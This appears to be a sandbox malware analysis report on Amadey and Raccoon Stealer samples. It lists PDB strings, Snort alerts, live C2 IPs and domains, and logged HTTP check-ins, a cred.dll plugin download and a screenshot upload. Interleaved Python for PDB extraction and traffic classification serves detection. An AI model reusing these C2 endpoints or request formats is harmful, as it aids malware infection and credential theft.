Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.772754936.0000000001121000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: MUC:\des.pdbh source: sbxGIUIhRd.exe, 00000000.00000000.658796199.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000000.00000002.664580287.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000001.00000000.662835925.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000000.749578013.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000002.754692319.0000000000401000.00000020.00020000.sdmp, adijaeg, 0000000A.00000000.751678783.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000000.762080930.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000002.772256038.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 00000010.00000000.767772391.0000000000401000.00000020.00020000.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdbz:^^ source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdby2V] source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
Source: Binary string: LC:\tiroducelidayu\citakuyar\g.pdbh source: E2A6.exe, 00000013.00000000.780837956.0000000000401000.00000020.00020000.sdmp, gaystiqf.exe, 00000023.00000000.802951269.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdb source: CFE8.exe, 00000012.00000000.774792717.0000000000401000.00000020.00020000.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8A6B.exe, 0000000C.00000000.756911608.0000000000413000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000002.806679360.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000011.00000002.805591545.0000000005480000.00000002.00020000.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbv source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb^ source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: C:\des.pdb source: sbxGIUIhRd.exe, sbxGIUIhRd.exe, 00000000.00000000.658796199.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000000.00000002.664580287.0000000000401000.00000020.00020000.sdmp, sbxGIUIhRd.exe, 00000001.00000000.662835925.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000000.749578013.0000000000401000.00000020.00020000.sdmp, adijaeg, 00000009.00000002.754692319.0000000000401000.00000020.00020000.sdmp, adijaeg, 0000000A.00000000.751678783.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000000.762080930.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 0000000D.00000002.772256038.0000000000401000.00000020.00020000.sdmp, 95C6.exe, 00000010.00000000.767772391.0000000000401000.00000020.00020000.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbT source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: C:\fuzobeficepo\fiwasito\cat45\yivo.pdbh source: CFE8.exe, 00000012.00000000.774792717.0000000000401000.00000020.00020000.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: C:\tiroducelidayu\citakuyar\g.pdb source: E2A6.exe, 00000013.00000000.780837956.0000000000401000.00000020.00020000.sdmp, gaystiqf.exe, 00000023.00000000.802951269.0000000000401000.00000020.00020000.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbl source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.778556492.0000000005460000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbj source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 8A6B.exe, 0000000C.00000000.756911608.0000000000413000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000002.806679360.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000011.00000002.805591545.0000000005480000.00000002.00020000.sdmp
                          Source: Binary string: profapi.pdb` source: WerFault.exe, 00000011.00000003.778582484.0000000005466000.00000004.00000040.sdmp
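The PDB paths above come from string scans of process memory dumps (the .sdmp sources), which is why several entries carry a stray trailing character that is not part of the path (shcore.pdbv, shlwapi.pdb^, cfgmgr32.pdbT). When pivoting on a path such as C:\des.pdb, which this report shows shared by sbxGIUIhRd.exe, adijaeg and 95C6.exe, it is better to read the path out of the PE debug directory and cut at its NUL terminator. The following Python is an added example, not code from the report or from Joe Sandbox: extract_pdb_path walks MZ -> PE -> optional header -> debug directory -> RSDS record with only the standard library, and build_sample_pe is hypothetical test scaffolding that constructs a minimal PE32 in memory (with a non-CodeView debug entry placed first, so the parser has to skip it).

```python
import struct

IMAGE_DEBUG_TYPE_CODEVIEW = 2
IMAGE_DEBUG_TYPE_REPRO = 16
DEBUG_ENTRY_SIZE = 28


def _rva_to_offset(rva, sections):
    """Map an RVA to a file offset using the section table."""
    for va, vsize, rawsize, rawptr in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + rawptr
    return None


def extract_pdb_path(data: bytes):
    """Return the NUL-terminated PDB path from the image's RSDS (CodeView 7)
    debug record, or None when the image carries no usable debug directory."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dd_base = opt + (96 if magic == 0x10B else 112)   # PE32 vs PE32+ data directories
    if struct.unpack_from("<I", data, dd_base - 4)[0] <= 6:   # NumberOfRvaAndSizes
        return None
    dbg_rva, dbg_size = struct.unpack_from("<II", data, dd_base + 6 * 8)  # IMAGE_DIRECTORY_ENTRY_DEBUG
    if dbg_rva == 0:
        return None
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + i * 40
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, hdr + 8)
        sections.append((va, vsize, rawsize, rawptr))
    off = _rva_to_offset(dbg_rva, sections)
    if off is None:
        return None
    for i in range(dbg_size // DEBUG_ENTRY_SIZE):
        # Entry layout: Characteristics, TimeDateStamp, Major, Minor, Type,
        # SizeOfData, AddressOfRawData, PointerToRawData; Type starts at +12.
        dtype, dsize, _addr, ptr = struct.unpack_from("<IIII", data, off + i * DEBUG_ENTRY_SIZE + 12)
        if dtype != IMAGE_DEBUG_TYPE_CODEVIEW or data[ptr:ptr + 4] != b"RSDS":
            continue   # REPRO, COFF or other entry types: keep looking
        # RSDS record: "RSDS", 16-byte GUID, 4-byte age, then the path
        path = data[ptr + 24:ptr + dsize]
        return path.split(b"\0", 1)[0].decode("latin-1")
    return None


def build_sample_pe(pdb_path: bytes) -> bytes:
    """Constructed test input (hypothetical): a minimal PE32 with one section whose
    raw data holds a two-entry debug directory, a payload-less REPRO entry first
    and the RSDS entry second, with junk after the path's NUL terminator."""
    sec_va, sec_ptr = 0x1000, 0x200
    repro = struct.pack("<IIHHIIII", 0, 0, 0, 0, IMAGE_DEBUG_TYPE_REPRO, 0, 0, 0)
    rsds_off = 2 * DEBUG_ENTRY_SIZE
    rsds = b"RSDS" + bytes(16) + struct.pack("<I", 1) + pdb_path + b"\0" + b"trailing-junk"
    codeview = struct.pack("<IIHHIIII", 0, 0, 0, 0, IMAGE_DEBUG_TYPE_CODEVIEW,
                           len(rsds), sec_va + rsds_off, sec_ptr + rsds_off)
    section = repro + codeview + rsds
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)                   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)        # i386, 1 section, PE32 opt hdr
    dirs = [(0, 0)] * 16
    dirs[6] = (sec_va, 2 * DEBUG_ENTRY_SIZE)                              # debug directory
    opt = (struct.pack("<H", 0x10B) + bytes(90) + struct.pack("<I", 16)
           + b"".join(struct.pack("<II", *d) for d in dirs))
    sec_hdr = struct.pack("<8sIIIIIIHHI", b".debug\0\0", len(section), sec_va,
                          len(section), sec_ptr, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\0\0" + coff + opt + sec_hdr
    return headers.ljust(sec_ptr, b"\0") + section


if __name__ == "__main__":
    # Paths taken from the report's PDB list, embedded in constructed images.
    for p in (b"C:\\des.pdb", b"C:\\fuzobeficepo\\fiwasito\\cat45\\yivo.pdb"):
        print(extract_pdb_path(build_sample_pe(p)))
```

On a real sample, pass the file contents to extract_pdb_path and group files by the returned path; identical paths across the dropped files point at one build rather than a coincidence of strings.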
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_00419A51 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00638A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_006312E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_006314D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00636090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00639930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00639BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00639D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

                          Networking:

                          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49908 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49910 -> 141.8.194.74:80
                          Source: Traffic | Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49914 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49912 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49916 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49919 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49920 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49922 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49924 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.4:49930 -> 185.163.204.24:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49931 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49932 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49937 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49941 -> 81.163.30.181:80
                          Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49945 -> 81.163.30.181:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49942 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49949 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49953 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49955 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.4:49959 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49956 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49962 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49964 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49965 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49967 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49968 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49969 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49970 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49971 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49972 -> 185.215.113.35:80
                          Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49973 -> 185.215.113.35:80
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 94.142.143.116 443
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: patmushta.info
                          Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 104.47.54.36 25
                          Source: C:\Windows\explorer.exe | Domain query: unicupload.top
                          Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exe | Domain query: privacy-tools-for-you-780.com
                          Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exe | Domain query: goo.su
                          Source: C:\Windows\explorer.exe | Domain query: transfer.sh
                          Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
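The Snort alerts above fire on request shapes that are easy to re-implement for log review. The following Python is an added example, not code from the report or from Joe Sandbox: it decodes the Amadey check-in body from the report's "Data Raw" hex and classifies raw HTTP requests into the four shapes seen here, the Amadey check-in POST (ET 2027700) and its ?scr=1 multipart screenshot upload, the single-character EXE download (ET 2018581) and the GET //l/f/<token>/<sha1> dependency download that the report attributes to Raccoon (ET 2033973). The regexes and key-order check are my approximations of those rules, not the ET rule bodies, and the request samples are constructed from the request lines recorded in this report plus one benign form login. One detail worth knowing: the hex decodes to un=jones while the report's Data Ascii line shows un=user; the decoded bytes are 82 long, matching Content-Length: 82, so the hex is the body as sent.

```python
import re
from urllib.parse import parse_qsl

# Key order of the Amadey check-in form body as recorded in this report.
AMADEY_KEYS = ["id", "vs", "sd", "os", "bi", "ar", "pc", "un", "dm", "av", "lv"]

# "Data Raw" hex of the check-in POST to 185.215.113.35, copied from the report.
AMADEY_DATA_RAW = (
    "69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 "
    "73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 "
    "26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 "
    "61 76 3d 31 33 26 6c 76 3d 30"
)


def decode_data_raw(hexdump: str) -> bytes:
    """Turn the report's space-separated 'Data Raw' hex into the bytes on the wire."""
    return bytes.fromhex(hexdump.replace(" ", ""))


def build_request(method, target, headers, body=b"") -> bytes:
    """Assemble a raw HTTP/1.1 request (used here to construct classifier input)."""
    head = f"{method} {target} HTTP/1.1\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers)
    return head.encode("latin-1") + b"\r\n" + body


def parse_http_request(raw: bytes):
    """Split a raw request into (method, target, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def amadey_fields(body: bytes) -> dict:
    """Split a check-in body into its fields; empty values such as dm= are kept."""
    return dict(parse_qsl(body.decode("latin-1"), keep_blank_values=True))


def classify(raw: bytes) -> str:
    """Label a request with the traffic shape it matches, or 'unclassified'."""
    method, target, headers, body = parse_http_request(raw)
    path, _, query = target.partition("?")
    ctype = headers.get("content-type", "")
    if method == "POST" and path.endswith("/index.php"):
        if query == "scr=1" and ctype.startswith("multipart/form-data"):
            return "amadey-screenshot-upload"
        if ctype == "application/x-www-form-urlencoded":
            # Match on the exact key sequence, not on any single value, so a
            # benign form with overlapping field names does not trigger.
            keys = [k for k, _ in parse_qsl(body.decode("latin-1"), keep_blank_values=True)]
            if keys == AMADEY_KEYS:
                return "amadey-checkin"
    if method == "GET" and re.fullmatch(r"/[0-9A-Za-z]\.exe", path):
        return "single-char-exe-download"
    if method == "GET" and re.fullmatch(r"//l/f/[0-9A-Za-z]+/[0-9a-f]{40}", path):
        return "raccoon-dependency-download"
    return "unclassified"


CHECKIN_BODY = decode_data_raw(AMADEY_DATA_RAW)

# Constructed requests: the first four reproduce request lines from this report,
# the last is a benign form login that must not match.
SAMPLES = {
    "checkin": build_request("POST", "/d2VxjasuwS/index.php",
        [("Content-Type", "application/x-www-form-urlencoded"), ("Host", "185.215.113.35"),
         ("Content-Length", str(len(CHECKIN_BODY))), ("Cache-Control", "no-cache")], CHECKIN_BODY),
    "screenshot": build_request("POST", "/d2VxjasuwS/index.php?scr=1",
        [("Content-Type", "multipart/form-data; boundary=----a1b03842422d99b86f413e6a2023f33f"),
         ("Host", "185.215.113.35"), ("Content-Length", "95326"), ("Cache-Control", "no-cache")],
        b"(screenshot bytes omitted)"),
    "exe": build_request("GET", "/1.exe", [("Host", "81.163.30.181"), ("Accept", "*/*")]),
    "raccoon": build_request("GET", "//l/f/S2zKVH4BZ2GIX1a3NFPE/bd39b08a69ef2a6dac4b951657d49c6ecf7db331",
        [("Cache-Control", "no-cache"), ("Connection", "Keep-Alive"),
         ("Pragma", "no-cache"), ("Host", "185.163.204.24")]),
    "benign": build_request("POST", "/login/index.php",
        [("Content-Type", "application/x-www-form-urlencoded"), ("Host", "intranet.example")],
        b"user=alice&password=hunter2"),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:10s} -> {classify(raw)}")
    print(amadey_fields(CHECKIN_BODY))
```

Feed the classifier reassembled requests from a capture or a proxy log; the check-in match is deliberately strict on key order because the field names alone (id, os, un) are common in legitimate forms.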
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1 | Host: 185.215.113.35
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 38 30 31 30 38 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=980108&un=user&dm=&av=13&lv=0
                          Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----a1b03842422d99b86f413e6a2023f33f | Host: 185.215.113.35 | Content-Length: 95326 | Cache-Control: no-cache
